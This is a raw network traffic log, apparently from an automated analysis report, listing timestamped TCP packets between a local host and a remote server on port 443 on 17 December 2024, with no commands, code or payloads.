                                                                                                                                                                              Dec 17, 2024 18:12:39.692251921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.692259073 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.692291975 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.693871021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.693972111 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.693983078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.694015980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.696168900 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.696244001 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.696249962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.696285009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.699387074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.699465990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.699472904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.699502945 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.701524019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.701591969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.701600075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.701639891 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.703064919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.703134060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.703140020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.703174114 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.706140041 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.706206083 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.706212044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.706250906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.708482981 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.708539963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.708581924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.708589077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.708626986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.710067034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.710125923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.710131884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.710170984 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.713136911 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.713202000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.713232040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.713272095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.714736938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.714795113 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.714802027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.714853048 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.871989012 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.872086048 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.872106075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.872140884 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.874866962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.874927044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.874936104 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.874969006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.877229929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.877288103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.877304077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.877345085 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.878719091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.878784895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.878793001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.878829956 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.881855011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.881917953 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.881927013 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.881958008 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.884174109 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.884242058 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.884252071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.884289980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.886645079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.886738062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.886746883 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.886791945 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.888827085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.888902903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.888911009 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.888951063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.891156912 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.891485929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.891494989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.891546011 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.893466949 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.893529892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.893538952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.893585920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.896013975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.896090031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.896099091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.896141052 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.898118973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.898189068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.898197889 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.898237944 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.900437117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.900506973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.900544882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.900551081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.900588036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.902684927 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.902743101 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.902750015 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.902782917 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.905042887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.905097961 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.905106068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.905157089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.062813997 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.062906027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.062935114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.062987089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.064429045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.064529896 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.064548969 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.064590931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.066874027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.066945076 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.066965103 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.067004919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.069295883 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.069370985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.069396019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.069437981 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.071413040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.071476936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.071497917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.071540117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.073803902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.073879004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.073888063 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.073930025 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.076036930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.076114893 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.076128006 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.076191902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.078445911 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.078536987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.078557968 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.078598976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.080780983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.080859900 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.080883026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.080926895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.083117008 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.083213091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.083233118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.083276033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.085356951 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.085453987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.085474014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.085517883 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.087755919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.087857008 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.087872982 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.087920904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.090048075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.090137959 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.090142965 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.090188980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.092392921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.092473030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.092478037 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.092695951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.094667912 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.094774008 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.094810009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.094822884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.094867945 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.096976995 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.097047091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.097052097 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.097099066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.265480995 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.265671968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.265713930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.265805006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.267518044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.267600060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.267621040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.267677069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.269967079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.270054102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.270083904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.270142078 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.272470951 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.272572994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.272591114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.272655964 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.274635077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.274728060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.274735928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.274781942 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.276940107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.277029037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.277035952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.277098894 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.279295921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.279391050 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.279397011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.279438019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.281533957 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.281613111 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.281622887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.281672955 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.283911943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.284018040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.284027100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.284075975 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.286226988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.286315918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.286325932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.286377907 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.288525105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.288621902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.288631916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.288676977 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.291030884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.291131020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.291143894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.291220903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.293222904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.293318033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.293330908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.293384075 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.295484066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.295587063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.295599937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.295654058 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.297780991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.297885895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.297908068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.297956944 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.300153971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.300254107 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.300285101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.300337076 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.457211971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.457370996 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.457396984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.457984924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.459249973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.459327936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.459332943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.459372997 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.461585045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.461667061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.461673021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.461708069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.463890076 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.463972092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.463978052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.464019060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.466229916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.466310024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.466315031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.466351986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.468512058 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.468591928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.468600035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.468837023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.470860958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.470935106 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.470940113 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.470979929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.473181963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.473259926 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.473264933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.473304987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.476274014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.476347923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.476352930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.476389885 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.477891922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.477967024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.477972031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.478013039 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.480155945 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.480240107 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.480246067 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.480281115 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.483267069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.483334064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.483340979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.483383894 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.484817982 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.484889030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.484893084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.484930992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.487138033 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.487206936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.487210035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.487250090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.490242958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.490314007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.490319967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.490359068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.491800070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.491872072 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.491875887 CET4434973198.142.240.215192.168.2.4
